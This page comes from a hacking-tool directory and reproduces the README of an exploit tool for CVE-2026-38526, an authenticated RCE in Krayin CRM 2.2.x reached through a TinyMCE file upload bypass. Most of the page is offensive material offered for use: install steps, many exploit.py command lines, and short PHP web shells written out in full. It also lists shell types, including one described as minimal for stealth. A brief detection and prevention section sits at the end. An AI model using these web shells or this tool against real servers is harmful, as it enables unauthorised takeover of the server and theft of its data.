Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — CVE-2026-38526 exploit for Krayin CRM v2.2.x - Authenticated RCE via TinyMCE file upload bypass. Features interactive shell, multi-type payloads, auto shell generation, and verification. Author: Sudeepa Wanigarathna. For authorized testing only. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingShellcode Generation
GitHub

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

KrayinCRM-RCE-Exploit-CVE-2026-38526

CVE-2026-38526 exploit for Krayin CRM v2.2.x - Authenticated RCE via TinyMCE file upload bypass. Features interactive shell, multi-type payloads, auto shell generation, and verification. Author: Sudeepa Wanigarathna. For authorized testing only.

View Repository
3162 months agoNot yet reviewed
Share

🔓 Krayin CRM v2.2.x - Authenticated Remote Code Execution Exploit

License: MIT CVE-2026-38526

⚠️ FOR AUTHORIZED SECURITY TESTING ONLY - Unauthorized use is illegal and unethical.

📋 Overview

This exploit tool demonstrates a critical authenticated remote code execution (RCE) vulnerability discovered in Krayin CRM version 2.2.x. The vulnerability exists in the TinyMCE file upload functionality, which allows authenticated administrators to upload and execute arbitrary PHP code on the server.

PropertyValue
CVE IDCVE-2026-38526
Affected SoftwareKrayin CRM v2.2.x
Vulnerability TypeAuthenticated Remote Code Execution (RCE)
Authentication RequiredYes (Admin-level access)
ImpactComplete system compromise
CVSS Score8.8 (High)

🚨 Vulnerability Details

The vulnerability stems from insufficient file type validation in the TinyMCE file upload endpoint (/admin/tinymce/upload). An authenticated administrator can:

  • Upload a PHP file disguised with an image MIME type.
  • The file is stored in a web-accessible location.
  • The attacker can then execute arbitrary PHP code on the server.

Affected Versions

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • All 2.2.x versions before patch release

✨ Features

  • Multiple Shell Types: Basic, Advanced, Minimal, File Manager, and Custom.
  • Interactive Shell: Full terminal-like interface with command history.
  • File Upload: Upload additional files through the shell.
  • CSRF Token Extraction: Automatic handling of CSRF protection.
  • Proxy Support: Route traffic through HTTP/HTTPS proxies.
  • Flexible Output Formats: Text, JSON, or Silent mode.
  • Retry Logic: Automatic retry on connection failures.
  • Custom Headers: Support for custom HTTP headers.
  • Verbose Mode: Detailed debugging output.
  • SSL Support: Optional SSL certificate verification.

📦 Installation

Requirements

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

Quick Install

git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

Requirements File (requirements.txt)

httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 Usage

Basic Command Syntax

python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> [OPTIONS]

Required Parameters

ParameterDescription
-t, --targetTarget URL (e.g., http://192.168.1.100)
-u, --usernameAdmin username or email
-p, --passwordAdmin password

Common Usage Examples

# Basic exploitation with generated shell
python3 exploit.py -t http://target.com -u [email protected] -p password

# Upload custom PHP shell file
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# Generate advanced shell with interactive mode
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# Generate shell file without exploitation
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# Use with proxy for testing/debugging
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# JSON output for automation
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# Verbose mode with custom timeout
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# Custom User-Agent and headers
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 Shell Types

  1. Basic Shell (basic) Simple command execution with system() function.

    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. Advanced Shell (advanced) Feature-rich shell with:

    • Multiple command execution methods
    • Beautiful terminal-like web interface
    • Command history support
    • Current user and hostname display
  3. Minimal Shell (minimal) Minimal footprint for stealth.

    <?php system($_GET["cmd"]); ?>
    
  4. File Manager (file_manager) Complete file management interface:

    • File upload
    • File deletion
    • Directory creation
    • Navigation
    • File permissions viewer
  5. Custom Shell (custom) Use your own PHP shell file with the -f parameter.

📝 Output Formats

Text Format (Default)

Human-readable colored output suitable for interactive use.

JSON Format (-o json)

Machine-readable format for automation and integration.

{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

Silent Format (-q, --quiet)

No output except for errors. Useful for batch processing.

⚙️ Advanced Options

OptionDescriptionDefault
--timeoutRequest timeout in seconds30
--retryNumber of retry attempts3
--retry-delayDelay between retries in seconds2
--user-agentCustom User-Agent stringDefault browser UA
--headerCustom HTTP headers (Key: Value)None
--verify-sslVerify SSL certificatesFalse
--proxyHTTP/HTTPS proxy URLNone
-v, --verboseEnable debug outputFalse
-q, --quietSuppress all outputFalse

Custom Headers Example

--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 Detection & Prevention

Signs of Compromise (IoC)

  • Files to Monitor:

    • Unusual PHP files in public/storage/upload/
    • Files with double extensions (e.g., image.php.jpg)
    • New files with suspicious names
  • Logs to Check:

    • /admin/tinymce/upload POST requests
    • Unusual admin login times
    • Failed authentication attempts
  • System Indicators:

    • Unexpected processes running
    • New cron jobs
    • Modified system files

Prevention Measures

  • Immediate Actions:

    # Update to patched version
    composer update krayin/crm
    
    # Disable admin access temporarily
    # Remove unnecessary admin accounts
    # Change all admin passwords
    
  • File Upload Hardening:

    // Validate file type by content, not just extension
    // Implement content security policy
    // Use Web Application Firewall (WAF)
    // Enable file upload scanning
    
Download Tool